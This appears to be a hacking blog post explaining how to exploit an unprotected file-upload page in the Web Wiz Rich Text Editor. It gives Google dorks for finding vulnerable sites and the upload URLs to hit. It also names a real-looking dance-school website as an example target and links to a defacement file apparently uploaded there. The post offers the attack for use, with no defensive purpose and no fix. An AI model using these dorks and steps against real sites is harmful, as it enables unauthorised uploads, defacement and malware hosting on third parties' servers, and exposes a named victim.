Remote File Inclusion/Upload Vulnerability On RTE Webwiz

We already discussed about "Remote File Inclusion/Upload Vulnerability on phUploader" in previous post, Today we are going to discuss about Remote File Inclusion/Upload Vulnerability On RTE Webwiz.

Web Wiz Rich Text Editor (RTE) is a free WYSIWYG HTML RTE that replaces standard text areas with an advanced Word-style HTML area.
Using this tool you can change any text area on your site into an HTML area with real-time WYSIWYG formatting. Useful for many purposes from basic submission forms to advanced CMS (Customer Management Systems).

(Click on the image to view in full size)

Steps :
1. Go to Google and Enter anyone of dork from below :
                         inurl:rte/my_documents/my_files/
                         inurl:/my_documents/my_files/
2. Select any website from search result, Exploit site looks like below link
                         http:// {site.com}/rte/RTE_popup_file_atch.asp
                         http:// {site.com}/admin/RTE_popup_file_atch.asp
3. Now you will see a screen like above image,In that you can upload your file
4. You can see your file link after upload link.
5. Done!! "

Example:
http://www.leinsterdancing.com/admin/rte/RTE_popup_fi le_atch.asp

Hacked Site:
http://www.leinsterdancing.com/ad min/rte/my_documents/my_files/5Z2_lodge4hacker.html

!! Thank You !!